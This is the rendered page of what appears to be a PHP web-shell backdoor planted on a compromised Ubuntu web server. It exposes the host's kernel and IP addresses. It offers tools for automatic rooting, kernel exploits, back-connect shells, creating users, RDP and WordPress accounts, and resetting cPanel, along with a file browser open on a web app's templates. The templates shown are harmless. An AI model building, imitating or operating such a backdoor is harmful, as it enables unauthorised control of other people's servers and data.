Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 13.58.192.154
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mixchief_app /
templates /
Users /
[ HOME SHELL ]
Name
Size
Permission
Action
confirmation.html.twig
414
B
-rw-rw-r--
email.html.twig
1.97
KB
-rw-rw-r--
emailsent.html.twig
403
B
-rw-rw-r--
passwordchange.html.twig
1.72
KB
-rw-rw-r--
passwordemail.html.twig
1.97
KB
-rw-rw-r--
passwordreset.html.twig
865
B
-rw-rw-r--
profile.html.twig
1.75
KB
-rw-rw-r--
receipt.html.twig
5.25
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : passwordreset.html.twig
{% extends 'base2.html.twig' %} {% block content %} <div class="login-form"> <div class="card"> <div class="card-header">Change Password</div> <div class="card-body"> {% if error %} <div id="error">{{ error }}</div> {% endif %} <form action="{{ path('password_email') }}" method="post" role="form"> <div class="form-group"> <input type="email" name="email" placeholder="Email Address" class="form-control" value="{{ email|default('') }}"> </div> <input type="submit" name="submit" value="Reset Password" class="btn btn-other"> </form> </div> </div> </div> {% endblock %}
Close